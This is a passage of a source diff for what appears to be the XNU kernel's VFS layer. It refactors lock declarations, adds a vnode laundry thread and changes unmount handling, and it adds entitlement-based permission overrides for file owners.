+                       msleep(&qfp->qf_qflags, &quota_list_mtx_lock, PVFS, "qf_get", NULL);
                }
                if (qfp->qf_vp == NULLVP) {
                        qfp->qf_qflags &= ~QTF_CLOSING;
@@ -405,7 +366,7 @@ dqfileinit(struct quotafile *qfp)
        qfp->qf_vp = NULLVP;
        qfp->qf_qflags = 0;
 
-       lck_mtx_init(&qfp->qf_lock, qf_lck_grp, qf_lck_attr);
+       lck_mtx_init(&qfp->qf_lock, &qf_lck_grp, LCK_ATTR_NULL);
 }
 
 
index 4ae72ee3d3cf9a4f4cdff1112f2a23e607cc06d7..cadd662a6836b2680ce2b050e46ab3362599cfc8 100644 (file)
 #include <vfs/vfs_disk_conditioner.h>
 #include <libkern/section_keywords.h>
 
-extern lck_grp_t *vnode_lck_grp;
-extern lck_attr_t *vnode_lck_attr;
+static LCK_GRP_DECLARE(vnode_lck_grp, "vnode");
+static LCK_ATTR_DECLARE(vnode_lck_attr, 0, 0);
 
 #if CONFIG_TRIGGERS
-extern lck_grp_t *trigger_vnode_lck_grp;
-extern lck_attr_t *trigger_vnode_lck_attr;
+static LCK_GRP_DECLARE(trigger_vnode_lck_grp, "trigger_vnode");
+static LCK_ATTR_DECLARE(trigger_vnode_lck_attr, 0, 0);
 #endif
 
-extern lck_mtx_t mnt_list_mtx_lock;
+extern lck_mtx_t mnt_list_mtx_lock;
 
 ZONE_DECLARE(specinfo_zone, "specinfo",
     sizeof(struct specinfo), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM);
@@ -172,7 +172,6 @@ int     vttoif_tab[9] = {
        S_IFSOCK, S_IFIFO, S_IFMT,
 };
 
-
 /* XXX These should be in a BSD accessible Mach header, but aren't. */
 extern void             memory_object_mark_used(
        memory_object_control_t         control);
@@ -259,6 +258,13 @@ TAILQ_HEAD(ragelst, vnode) vnode_rage_list;     /* vnode rapid age list */
 struct timeval rage_tv;
 int     rage_limit = 0;
 int     ragevnodes = 0;
+
+int   deadvnodes_low = 0;
+int   deadvnodes_high = 0;
+
+uint64_t newvnode = 0;
+uint64_t newvnode_nodead = 0;
+
 static  int vfs_unmountall_started = 0;
 
 #define RAGE_LIMIT_MIN  100
@@ -348,6 +354,7 @@ static int print_busy_vnodes = 0;                               /* print out bus
        } while(0)
 
 static void async_work_continue(void);
+static void vn_laundry_continue(void);
 
 /*
  * Initialize the vnode management data structures.
@@ -370,11 +377,19 @@ vntblinit(void)
                rage_limit = RAGE_LIMIT_MIN;
        }
 
+       deadvnodes_low = (desiredvnodes) / 100;
+       if (deadvnodes_low > 300) {
+               deadvnodes_low = 300;
+       }
+       deadvnodes_high = deadvnodes_low * 2;
+
        /*
         * create worker threads
         */
        kernel_thread_start((thread_continue_t)async_work_continue, NULL, &thread);
        thread_deallocate(thread);
+       kernel_thread_start((thread_continue_t)vn_laundry_continue, NULL, &thread);
+       thread_deallocate(thread);
 }
 
 /* the timeout is in 10 msecs */
@@ -461,7 +476,7 @@ vnode_hasdirtyblks(vnode_t vp)
        struct cl_writebehind *wbp;
 
        /*
-        * Not taking the buf_mtxp as there is little
+        * Not taking the buf_mtx as there is little
         * point doing it. Even if the lock is taken the
         * state can change right after that. If their
         * needs to be a synchronization, it must be driven
@@ -488,7 +503,7 @@ int
 vnode_hascleanblks(vnode_t vp)
 {
        /*
-        * Not taking the buf_mtxp as there is little
+        * Not taking the buf_mtx as there is little
         * point doing it. Even if the lock is taken the
         * state can change right after that. If their
         * needs to be a synchronization, it must be driven
@@ -903,7 +918,7 @@ mount_iterdrain(mount_t mp)
 {
        mount_list_lock();
        while (mp->mnt_iterref) {
-               msleep((caddr_t)&mp->mnt_iterref, mnt_list_mtx_lock, PVFS, "mount_iterdrain", NULL);
+               msleep((caddr_t)&mp->mnt_iterref, &mnt_list_mtx_lock, PVFS, "mount_iterdrain", NULL);
        }
        /* mount iterations drained */
        mp->mnt_iterref = -1;
@@ -1308,7 +1323,7 @@ cache_purge_callback(mount_t mp, __unused void * arg)
        return VFS_RETURNED;
 }
 
-extern lck_rw_t rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 extern void set_rootvnode(vnode_t);
 
 
@@ -1655,7 +1670,7 @@ vfs_switch_root(const char *incoming_vol_old_path,
                pmi->pm_mount = pmi->pm_rootvnode->v_mount;
        }
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
 
        /* Setup incoming as the new rootfs */
        lck_rw_lock_exclusive(&incoming->mnt_rwlock);
@@ -1701,6 +1716,11 @@ vfs_switch_root(const char *incoming_vol_old_path,
        vnode_unlock(outgoing_vol_new_covered_vp);
        lck_rw_done(&outgoing->mnt_rwlock);
 
+       if (!(outgoing->mnt_kern_flag & MNTK_VIRTUALDEV) &&
+           (TAILQ_FIRST(&mountlist) == outgoing)) {
+               vfs_setmntsystem(outgoing);
+       }
+
        /*
         * Finally, remove the mount_t linkage from the previously covered
         * vnodes on the old root volume. These were incoming_vol_old_path,
@@ -1734,7 +1754,7 @@ vfs_switch_root(const char *incoming_vol_old_path,
         * prevents concurrent vnode_lookups.
         */
        set_rootvnode(incoming_rootvnode);
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
 
        if (!(incoming->mnt_kern_flag & MNTK_VIRTUALDEV) &&
            !(outgoing->mnt_kern_flag & MNTK_VIRTUALDEV)) {
@@ -2888,7 +2908,14 @@ vclean(vnode_t vp, int flags)
        }
 
 #if CONFIG_MACF
-       mac_vnode_notify_reclaim(vp);
+       if (vp->v_mount) {
+               /*
+                * It is possible for bdevvp vnodes to not have a mount
+                * pointer. It's fine to let it get reclaimed without
+                * notifying.
+                */
+               mac_vnode_notify_reclaim(vp);
+       }
 #endif
 
        if (active && (flags & DOCLOSE)) {
@@ -2968,6 +2995,12 @@ vclean(vnode_t vp, int flags)
        }
 #endif
 
+#if CONFIG_IO_COMPRESSION_STATS
+       if ((vp->io_compression_stats)) {
+               vnode_iocs_record_and_free(vp);
+       }
+#endif /* CONFIG_IO_COMPRESSION_STATS */
+
        /*
         * Reclaim the vnode.
         */
@@ -3472,7 +3505,7 @@ extension_cmp(const void *a, const void *b)
 // them (i.e. a short 8 character name can't have an 8
 // character extension).
 //
-extern lck_mtx_t *pkg_extensions_lck;
+extern lck_mtx_t pkg_extensions_lck;
 
 __private_extern__ int
 set_package_extensions_table(user_addr_t data, int nentries, int maxwidth)
@@ -3503,7 +3536,7 @@ set_package_extensions_table(user_addr_t data, int nentries, int maxwidth)
 
        qsort(new_exts, nentries, maxwidth, extension_cmp);
 
-       lck_mtx_lock(pkg_extensions_lck);
+       lck_mtx_lock(&pkg_extensions_lck);
 
        old_exts        = extension_table;
        old_nentries    = nexts;
@@ -3512,7 +3545,7 @@ set_package_extensions_table(user_addr_t data, int nentries, int maxwidth)
        nexts           = nentries;
        max_ext_width   = maxwidth;
 
-       lck_mtx_unlock(pkg_extensions_lck);
+       lck_mtx_unlock(&pkg_extensions_lck);
 
        kheap_free(KHEAP_DATA_BUFFERS, old_exts,
            (old_nentries * old_maxwidth) + 1);
@@ -3550,7 +3583,7 @@ is_package_name(const char *name, int len)
        // advance over the "."
        name_ext++;
 
-       lck_mtx_lock(pkg_extensions_lck);
+       lck_mtx_lock(&pkg_extensions_lck);
 
        // now iterate over all the extensions to see if any match
        ptr = &extension_table[0];
@@ -3558,12 +3591,12 @@ is_package_name(const char *name, int len)
                extlen = strlen(ptr);
                if (strncasecmp(name_ext, ptr, extlen) == 0 && name_ext[extlen] == '\0') {
                        // aha, a match!
-                       lck_mtx_unlock(pkg_extensions_lck);
+                       lck_mtx_unlock(&pkg_extensions_lck);
                        return 1;
                }
        }
 
-       lck_mtx_unlock(pkg_extensions_lck);
+       lck_mtx_unlock(&pkg_extensions_lck);
 
        // if we get here, no extension matched
        return 0;
@@ -3814,6 +3847,8 @@ out:
 struct unmount_info {
        int     u_errs; // Total failed unmounts
        int     u_busy; // EBUSY failed unmounts
+       int     u_count; // Total volumes iterated
+       int     u_only_non_system;
 };
 
 static int
@@ -3823,18 +3858,27 @@ unmount_callback(mount_t mp, void *arg)
        char *mntname;
        struct unmount_info *uip = arg;
 
-       mount_ref(mp, 0);
-       mount_iterdrop(mp);     // avoid vfs_iterate deadlock in dounmount()
+       uip->u_count++;
 
        mntname = zalloc(ZV_NAMEI);
        strlcpy(mntname, mp->mnt_vfsstat.f_mntonname, MAXPATHLEN);
 
-       error = dounmount(mp, MNT_FORCE, 1, vfs_context_current());
-       if (error) {
-               uip->u_errs++;
-               printf("Unmount of %s failed (%d)\n", mntname ? mntname:"?", error);
-               if (error == EBUSY) {
-                       uip->u_busy++;
+       if (uip->u_only_non_system
+           && ((mp->mnt_flag & MNT_ROOTFS) || (mp->mnt_kern_flag & MNTK_SYSTEM))) { //MNTK_BACKS_ROOT
+               printf("unmount(%d) %s skipped\n", uip->u_only_non_system, mntname);
+               mount_iterdrop(mp);     // VFS_ITERATE_CB_DROPREF
+       } else {
+               printf("unmount(%d) %s\n", uip->u_only_non_system, mntname);
+
+               mount_ref(mp, 0);
+               mount_iterdrop(mp);     // VFS_ITERATE_CB_DROPREF
+               error = dounmount(mp, MNT_FORCE, 1, vfs_context_current());
+               if (error) {
+                       uip->u_errs++;
+                       printf("Unmount of %s failed (%d)\n", mntname ? mntname:"?", error);
+                       if (error == EBUSY) {
+                               uip->u_busy++;
+                       }
                }
        }
        if (mntname) {
@@ -3850,21 +3894,23 @@ unmount_callback(mount_t mp, void *arg)
  * Busy mounts are retried.
  */
 __private_extern__ void
-vfs_unmountall(void)
+vfs_unmountall(int only_non_system)
 {
        int mounts, sec = 1;
        struct unmount_info ui;
 
        vfs_unmountall_started = 1;
+       printf("vfs_unmountall(%ssystem) start\n", only_non_system ? "non" : "");
 
 retry:
-       ui.u_errs = ui.u_busy = 0;
+       ui.u_errs = ui.u_busy = ui.u_count = 0;
+       ui.u_only_non_system = only_non_system;
+       // avoid vfs_iterate deadlock in dounmount(), use VFS_ITERATE_CB_DROPREF
        vfs_iterate(VFS_ITERATE_CB_DROPREF | VFS_ITERATE_TAIL_FIRST, unmount_callback, &ui);
        mounts = mount_getvfscnt();
        if (mounts == 0) {
                return;
        }
-
        if (ui.u_busy > 0) {            // Busy mounts - wait & retry
                tsleep(&nummounts, PVFS, "busy mount", sec * hz);
                sec *= 2;
@@ -3872,10 +3918,12 @@ retry:
                        goto retry;
                }
                printf("Unmounting timed out\n");
-       } else if (ui.u_errs < mounts) {
+       } else if (ui.u_count < mounts) {
                // If the vfs_iterate missed mounts in progress - wait a bit
                tsleep(&nummounts, PVFS, "missed mount", 2 * hz);
        }
+
+       printf("vfs_unmountall(%ssystem) end\n", only_non_system ? "non" : "");
 }
 
 /*
@@ -4201,15 +4249,13 @@ vfs_init_io_attributes(vnode_t devvp, mount_t mp)
 }
 
 static struct klist fs_klist;
-lck_grp_t *fs_klist_lck_grp;
-lck_mtx_t *fs_klist_lock;
+static LCK_GRP_DECLARE(fs_klist_lck_grp, "fs_klist");
+static LCK_MTX_DECLARE(fs_klist_lock, &fs_klist_lck_grp);
 
 void
 vfs_event_init(void)
 {
        klist_init(&fs_klist);
-       fs_klist_lck_grp = lck_grp_alloc_init("fs_klist", NULL);
-       fs_klist_lock = lck_mtx_alloc_init(fs_klist_lck_grp, NULL);
 }
 
 void
@@ -4228,9 +4274,9 @@ vfs_event_signal(fsid_t *fsid, u_int32_t event, intptr_t data)
                }
        }
 
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
        KNOTE(&fs_klist, event);
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
 }
 
 /*
@@ -4615,9 +4661,9 @@ filt_fsattach(struct knote *kn, __unused struct kevent_qos_s *kev)
        kn->kn_flags |= EV_CLEAR; /* automatic */
        kn->kn_sdata = 0;         /* incoming data is ignored */
 
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
        KNOTE_ATTACH(&fs_klist, kn);
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
 
        /*
         * filter only sees future events,
@@ -4629,9 +4675,9 @@ filt_fsattach(struct knote *kn, __unused struct kevent_qos_s *kev)
 static void
 filt_fsdetach(struct knote *kn)
 {
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
        KNOTE_DETACH(&fs_klist, kn);
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
 }
 
 static int
@@ -4654,7 +4700,7 @@ filt_fstouch(struct knote *kn, struct kevent_qos_s *kev)
 {
        int res;
 
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
 
        kn->kn_sfflags = kev->fflags;
 
@@ -4670,7 +4716,7 @@ filt_fstouch(struct knote *kn, struct kevent_qos_s *kev)
        //      kn->kn_fflags &= kn->kn_sfflags;
        res = (kn->kn_fflags != 0);
 
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
 
        return res;
 }
@@ -4680,12 +4726,12 @@ filt_fsprocess(struct knote *kn, struct kevent_qos_s *kev)
 {
        int res = 0;
 
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
        if (kn->kn_fflags) {
                knote_fill_kevent(kn, kev, 0);
                res = 1;
        }
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
        return res;
 }
 
@@ -4781,7 +4827,8 @@ sysctl_vfs_generic_conf SYSCTL_HANDLER_ARGS
 }
 
 /* the vfs.generic. branch. */
-SYSCTL_NODE(_vfs, VFS_GENERIC, generic, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs generic hinge");
+SYSCTL_EXTENSIBLE_NODE(_vfs, VFS_GENERIC, generic,
+    CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs generic hinge");
 /* retreive a list of mounted filesystem fsid_t */
 SYSCTL_PROC(_vfs_generic, OID_AUTO, vfsidlist,
     CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_LOCKED,
@@ -4857,7 +4904,7 @@ long num_reusedvnodes = 0;
 
 
 static vnode_t
-process_vp(vnode_t vp, int want_vp, int *deferred)
+process_vp(vnode_t vp, int want_vp, bool can_defer, int *deferred)
 {
        unsigned int  vpid;
 
@@ -4916,7 +4963,7 @@ process_vp(vnode_t vp, int want_vp, int *deferred)
         * Checks for anyone racing us for recycle
         */
        if (vp->v_type != VBAD) {
-               if (want_vp && (vnode_on_reliable_media(vp) == FALSE || (vp->v_flag & VISDIRTY))) {
+               if ((want_vp || can_defer) && (vnode_on_reliable_media(vp) == FALSE || (vp->v_flag & VISDIRTY))) {
                        vnode_async_list_add(vp);
                        vnode_unlock(vp);
 
@@ -4979,7 +5026,7 @@ async_work_continue(void)
 
                vp = TAILQ_FIRST(q);
 
-               vp = process_vp(vp, 0, &deferred);
+               vp = process_vp(vp, 0, false, &deferred);
 
                if (vp != NULLVP) {
                        panic("found VBAD vp (%p) on async queue", vp);
@@ -4987,6 +5034,68 @@ async_work_continue(void)
        }
 }
 
+__attribute__((noreturn))
+static void
+vn_laundry_continue(void)
+{
+       struct freelst *free_q;
+       struct ragelst *rage_q;
+       int     deferred;
+       vnode_t vp;
+       bool rage_q_empty;
+       bool free_q_empty;
+
+
+       free_q = &vnode_free_list;
+       rage_q = &vnode_rage_list;
+
+       for (;;) {
+               vnode_list_lock();
+
+               free_q_empty = TAILQ_EMPTY(free_q);
+               rage_q_empty = TAILQ_EMPTY(rage_q);
+
+               if (!rage_q_empty && !free_q_empty) {
+                       struct timeval current_tv;
+
+                       microuptime(&current_tv);
+                       if (ragevnodes < rage_limit &&
+                           ((current_tv.tv_sec - rage_tv.tv_sec) < RAGE_TIME_LIMIT)) {
+                               rage_q_empty = true;
+                       }
+               }
+
+               if (deadvnodes >= deadvnodes_high ||
+                   (rage_q_empty && free_q_empty) ||
+                   numvnodes < desiredvnodes) {
+                       assert_wait(free_q, (THREAD_UNINT));
+
+                       vnode_list_unlock();
+
+                       thread_block((thread_continue_t)vn_laundry_continue);
+
+                       continue;
+               }
+
+               if (!rage_q_empty) {
+                       vp = TAILQ_FIRST(rage_q);
+               } else {
+                       vp = TAILQ_FIRST(free_q);
+               }
+
+               vp = process_vp(vp, 0, true, &deferred);
+       }
+}
+
+static inline void
+wakeup_laundry_thread()
+{
+       if ((deadvnodes < deadvnodes_low) &&
+           /* Minimum number of free vnodes the thread should act on */
+           ((freevnodes + ragevnodes) > 10)) {
+               wakeup(&vnode_free_list);
+       }
+}
 
 static int
 new_vnode(vnode_t *vpp)
@@ -5006,6 +5115,7 @@ retry:
        vp = NULLVP;
 
        vnode_list_lock();
+       newvnode++;
 
        if (need_reliable_vp == TRUE) {
                async_work_timed_out++;
@@ -5019,6 +5129,9 @@ retry:
                         * Can always reuse a dead one
                         */
                        vp = TAILQ_FIRST(&vnode_dead_list);
+                       if (numvnodes >= desiredvnodes) {
+                               wakeup_laundry_thread();
+                       }
                        goto steal_this_vp;
                }
                /*
@@ -5026,11 +5139,14 @@ retry:
                 * the limit, we'll create a new vnode
                 */
                numvnodes++;
+               if (numvnodes >= desiredvnodes) {
+                       wakeup_laundry_thread();
+               }
                vnode_list_unlock();
 
                vp = zalloc_flags(vnode_zone, Z_WAITOK | Z_ZERO);
                VLISTNONE(vp);          /* avoid double queue removal */
-               lck_mtx_init(&vp->v_lock, vnode_lck_grp, vnode_lck_attr);
+               lck_mtx_init(&vp->v_lock, &vnode_lck_grp, &vnode_lck_attr);
 
                TAILQ_INIT(&vp->v_ncchildren);
 
@@ -5048,6 +5164,9 @@ retry:
                vp->v_iocount = 1;
                goto done;
        }
+
+       wakeup_laundry_thread();
+
        microuptime(&current_tv);
 
 #define MAX_WALK_COUNT 1000
@@ -5060,16 +5179,6 @@ retry:
                                panic("new_vnode: vp (%p) on RAGE list not marked VLIST_RAGE", vp);
                        }
 
-                       /*
-                        * skip free vnodes created by bdevvp as they are
-                        * typically not fully constructedi and may have issues
-                        * in getting reclaimed.
-                        */
-                       if (vp->v_flag & VBDEVVP) {
-                               bdevvp_vnodes++;
-                               continue;
-                       }
-
                        // if we're a dependency-capable process, skip vnodes that can
                        // cause recycling deadlocks. (i.e. this process is diskimages
                        // helper and the vnode is in a disk image).  Querying the
@@ -5108,16 +5217,6 @@ retry:
                 */
                walk_count = 0;
                TAILQ_FOREACH(vp, &vnode_free_list, v_freelist) {
-                       /*
-                        * skip free vnodes created by bdevvp as they are
-                        * typically not fully constructedi and may have issues
-                        * in getting reclaimed.
-                        */
-                       if (vp->v_flag & VBDEVVP) {
-                               bdevvp_vnodes++;
-                               continue;
-                       }
-
                        // if we're a dependency-capable process, skip vnodes that can
                        // cause recycling deadlocks. (i.e. this process is diskimages
                        // helper and the vnode is in a disk image).  Querying the
@@ -5217,8 +5316,9 @@ retry:
                *vpp = NULL;
                return ENFILE;
        }
+       newvnode_nodead++;
 steal_this_vp:
-       if ((vp = process_vp(vp, 1, &deferred)) == NULLVP) {
+       if ((vp = process_vp(vp, 1, true, &deferred)) == NULLVP) {
                if (deferred) {
                        int     elapsed_msecs;
                        struct timeval elapsed_tv;
@@ -8006,6 +8106,14 @@ vnode_authorize_posix(vauth_ctx vcp, int action, int on_dir)
        }
        owner_ok = (needed & vap->va_mode) == needed;
 
+       /*
+        * Processes with the appropriate entitlement can marked themselves as
+        * ignoring file/directory permissions if they own it.
+        */
+       if (!owner_ok && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+               owner_ok = 1;
+       }
+
        /* group permissions */
        needed = 0;
        if (action & VREAD) {
@@ -8037,6 +8145,7 @@ vnode_authorize_posix(vauth_ctx vcp, int action, int on_dir)
                _SETWHERE("all");
                goto out;
        }
+
        if (!owner_ok && !group_ok && !world_ok) {
                _SETWHERE("all");
                error = EACCES;
@@ -8199,6 +8308,10 @@ vnode_authorize_delete(vauth_ctx vcp, boolean_t cached_delete_child)
 
                switch (eval.ae_result) {
                case KAUTH_RESULT_DENY:
+                       if (vauth_file_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+                               KAUTH_DEBUG("%p    Override DENY due to entitlement", vcp->vp);
+                               return 0;
+                       }
                        KAUTH_DEBUG("%p    DENIED - denied by ACL", vcp->vp);
                        return EACCES;
                case KAUTH_RESULT_ALLOW:
@@ -8267,6 +8380,10 @@ vnode_authorize_delete(vauth_ctx vcp, boolean_t cached_delete_child)
                }
                switch (eval.ae_result) {
                case KAUTH_RESULT_DENY:
+                       if (vauth_dir_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+                               KAUTH_DEBUG("%p    Override DENY due to entitlement", vcp->vp);
+                               return 0;
+                       }
                        KAUTH_DEBUG("%p    DENIED - denied by directory ACL", vcp->vp);
                        return EACCES;
                case KAUTH_RESULT_ALLOW:
@@ -8390,6 +8507,10 @@ vnode_authorize_simple(vauth_ctx vcp, kauth_ace_rights_t acl_rights, kauth_ace_r
 
                switch (eval.ae_result) {
                case KAUTH_RESULT_DENY:
+                       if (vauth_file_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+                               KAUTH_DEBUG("%p    Override DENY due to entitlement", vcp->vp);
+                               return 0;
+                       }
                        KAUTH_DEBUG("%p    DENIED - by ACL", vcp->vp);
                        return EACCES;         /* deny, deny, counter-allege */
                case KAUTH_RESULT_ALLOW:
@@ -8516,7 +8637,8 @@ vnode_authorize_simple(vauth_ctx vcp, kauth_ace_rights_t acl_rights, kauth_ace_r
  * Check for file immutability.
  */
 static int
-vnode_authorize_checkimmutable(mount_t mp, struct vnode_attr *vap, int rights, int ignore)
+vnode_authorize_checkimmutable(mount_t mp, vauth_ctx vcp,
+    struct vnode_attr *vap, int rights, int ignore)
 {
        int error;
        int append;
@@ -8569,6 +8691,22 @@ vnode_authorize_checkimmutable(mount_t mp, struct vnode_attr *vap, int rights, i
                        }
                }
                if ((error = vnode_immutable(vap, append, ignore)) != 0) {
+                       if (error && !ignore) {
+                               /*
+                                * In case of a rename, we want to check ownership for dvp as well.
+                                */
+                               int owner = 0;
+                               if (rights & KAUTH_VNODE_DELETE_CHILD && vcp->dvp != NULL) {
+                                       owner = vauth_file_owner(vcp) && vauth_dir_owner(vcp);
+                               } else {
+                                       owner = vauth_file_owner(vcp);
+                               }
+                               if (owner && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+                                       error = vnode_immutable(vap, append, 1);
+                               }
+                       }
+               }
+               if (error) {
                        KAUTH_DEBUG("%p    DENIED - file is immutable", vap);
                        goto out;
                }
@@ -8779,14 +8917,14 @@ vnode_attr_authorize_internal(vauth_ctx vcp, mount_t mp,
         * In the deletion case, parent directory immutability vetoes specific
         * file rights.
         */
-       if ((result = vnode_authorize_checkimmutable(mp, vcp->vap, rights,
+       if ((result = vnode_authorize_checkimmutable(mp, vcp, vcp->vap, rights,
            noimmutable)) != 0) {
                goto out;
        }
 
        if ((rights & KAUTH_VNODE_DELETE) &&
            !parent_authorized_for_delete_child) {
-               result = vnode_authorize_checkimmutable(mp, vcp->dvap,
+               result = vnode_authorize_checkimmutable(mp, vcp, vcp->dvap,
                    KAUTH_VNODE_DELETE_CHILD, 0);
                if (result) {
                        goto out;
@@ -10687,7 +10825,7 @@ vnode_resolver_create(mount_t mp, vnode_t vp, struct vnode_trigger_param *tinfo,
                return ENOMEM;
        }
 
-       lck_mtx_init(&rp->vr_lock, trigger_vnode_lck_grp, trigger_vnode_lck_attr);
+       lck_mtx_init(&rp->vr_lock, &trigger_vnode_lck_grp, &trigger_vnode_lck_attr);
 
        rp->vr_resolve_func = tinfo->vnt_resolve_func;
        rp->vr_unresolve_func = tinfo->vnt_unresolve_func;
@@ -10726,7 +10864,7 @@ vnode_resolver_release(vnode_resolve_t rp)
                rp->vr_reclaim_func(NULLVP, rp->vr_data);
        }
 
-       lck_mtx_destroy(&rp->vr_lock, trigger_vnode_lck_grp);
+       lck_mtx_destroy(&rp->vr_lock, &trigger_vnode_lck_grp);
        kheap_free(KHEAP_DEFAULT, rp, sizeof(struct vnode_resolve));
 }
 
index cb7cf97fddaf0d9a4fccb4207a305c7c9d775192..a1c721e9e709434382a7ca41b3ab80b5e5a55b61 100644 (file)
@@ -253,11 +253,14 @@ int sync_internal(void);
 __private_extern__
 int unlink1(vfs_context_t, vnode_t, user_addr_t, enum uio_seg, int);
 
-extern lck_grp_t *fd_vn_lck_grp;
-extern lck_grp_attr_t *fd_vn_lck_grp_attr;
-extern lck_attr_t *fd_vn_lck_attr;
+static LCK_GRP_DECLARE(fd_vn_lck_grp, "fd_vnode_data");
+static LCK_ATTR_DECLARE(fd_vn_lck_attr, 0, 0);
 
-extern lck_rw_t * rootvnode_rw_lock;
+/* vars for sync mutex */
+static LCK_GRP_DECLARE(sync_mtx_lck_grp, "sync thread");
+static LCK_MTX_DECLARE(sync_mtx_lck, &sync_mtx_lck_grp);
+
+extern lck_rw_t rootvnode_rw_lock;
 
 /*
  * incremented each time a mount or unmount operation occurs
@@ -859,6 +862,11 @@ mount_common(char *fstypename, vnode_t pvp, vnode_t vp,
        }
 #endif /* CONFIG_NFS_CLIENT || DEVFS */
 
+       if (KERNEL_MOUNT_DEVFS & internal_flags) {
+               // kernel mounted devfs
+               mp->mnt_kern_flag |= MNTK_SYSTEM;
+       }
+
 update:
 
        /*
@@ -2198,10 +2206,10 @@ checkdirs(vnode_t olddp, vfs_context_t ctx)
 
        if (rootvnode == olddp) {
                vnode_ref(newdp);
-               lck_rw_lock_exclusive(rootvnode_rw_lock);
+               lck_rw_lock_exclusive(&rootvnode_rw_lock);
                tvp = rootvnode;
                rootvnode = newdp;
-               lck_rw_unlock_exclusive(rootvnode_rw_lock);
+               lck_rw_unlock_exclusive(&rootvnode_rw_lock);
                vnode_rele(tvp);
        }
 
@@ -2317,6 +2325,10 @@ safedounmount(struct mount *mp, int flags, vfs_context_t ctx)
         * associated with it (for example, the associated VM or DATA mounts) .
         */
        if ((mp->mnt_flag & MNT_ROOTFS) || (mp->mnt_kern_flag & MNTK_SYSTEM)) {
+               if (!(mp->mnt_flag & MNT_ROOTFS)) {
+                       printf("attempt to unmount a system mount (%s), will return EBUSY\n",
+                           mp->mnt_vfsstat.f_mntonname);
+               }
                error = EBUSY; /* the root (or associated volumes) is always busy */
                goto out;
        }
@@ -2833,17 +2845,17 @@ sync_thread(__unused void *arg, __unused wait_result_t wr)
        pm_sync_thread = current_thread();
 #endif /* CONFIG_PHYS_WRITE_ACCT */
 
-       lck_mtx_lock(sync_mtx_lck);
+       lck_mtx_lock(&sync_mtx_lck);
        while (sync_thread_state & SYNC_THREAD_RUN) {
                sync_thread_state &= ~SYNC_THREAD_RUN;
-               lck_mtx_unlock(sync_mtx_lck);
+               lck_mtx_unlock(&sync_mtx_lck);
 
                sync_type = SYNC_ONLY_RELIABLE_MEDIA;
                vfs_iterate(LK_NOWAIT, sync_internal_callback, &sync_type);
                sync_type = SYNC_ONLY_UNRELIABLE_MEDIA;
                vfs_iterate(LK_NOWAIT, sync_internal_callback, &sync_type);
 
-               lck_mtx_lock(sync_mtx_lck);
+               lck_mtx_lock(&sync_mtx_lck);
        }
        /*
         * This wakeup _has_ to be issued before the lock is released otherwise
@@ -2856,7 +2868,7 @@ sync_thread(__unused void *arg, __unused wait_result_t wr)
 #if CONFIG_PHYS_WRITE_ACCT
        pm_sync_thread = NULL;
 #endif /* CONFIG_PHYS_WRITE_ACCT */
-       lck_mtx_unlock(sync_mtx_lck);
+       lck_mtx_unlock(&sync_mtx_lck);
 
        if (print_vmpage_stat) {
                vm_countdirtypages();
@@ -2883,7 +2895,7 @@ sync_internal(void)
        int thread_created = FALSE;
        struct timespec ts = {.tv_sec = sync_timeout_seconds, .tv_nsec = 0};
 
-       lck_mtx_lock(sync_mtx_lck);
+       lck_mtx_lock(&sync_mtx_lck);
        sync_thread_state |= SYNC_THREAD_RUN;
        if (!(sync_thread_state & SYNC_THREAD_RUNNING)) {
                int kr;
@@ -2892,14 +2904,14 @@ sync_internal(void)
                kr = kernel_thread_start(sync_thread, NULL, &thd);
                if (kr != KERN_SUCCESS) {
                        sync_thread_state &= ~SYNC_THREAD_RUNNING;
-                       lck_mtx_unlock(sync_mtx_lck);
+                       lck_mtx_unlock(&sync_mtx_lck);
                        printf("sync_thread failed\n");
                        return 0;
                }
                thread_created = TRUE;
        }
 
-       error = msleep((caddr_t)&sync_thread_state, sync_mtx_lck,
+       error = msleep((caddr_t)&sync_thread_state, &sync_mtx_lck,
            (PVFS | PDROP | PCATCH), "sync_thread", &ts);
        if (error) {
                struct timeval now;
@@ -4119,7 +4131,7 @@ fg_vn_data_alloc(void)
        /* Allocate per fd vnode data */
        fvdata = kheap_alloc(KM_FD_VN_DATA, sizeof(struct fd_vn_data),
            Z_WAITOK | Z_ZERO);
-       lck_mtx_init(&fvdata->fv_lock, fd_vn_lck_grp, fd_vn_lck_attr);
+       lck_mtx_init(&fvdata->fv_lock, &fd_vn_lck_grp, &fd_vn_lck_attr);
        return fvdata;
 }
 
@@ -4132,7 +4144,7 @@ fg_vn_data_free(void *fgvndata)
        struct fd_vn_data *fvdata = (struct fd_vn_data *)fgvndata;
 
        kheap_free(KHEAP_DATA_BUFFERS, fvdata->fv_buf, fvdata->fv_bufallocsiz);
-       lck_mtx_destroy(&fvdata->fv_lock, fd_vn_lck_grp);
+       lck_mtx_destroy(&fvdata->fv_lock, &fd_vn_lck_grp);
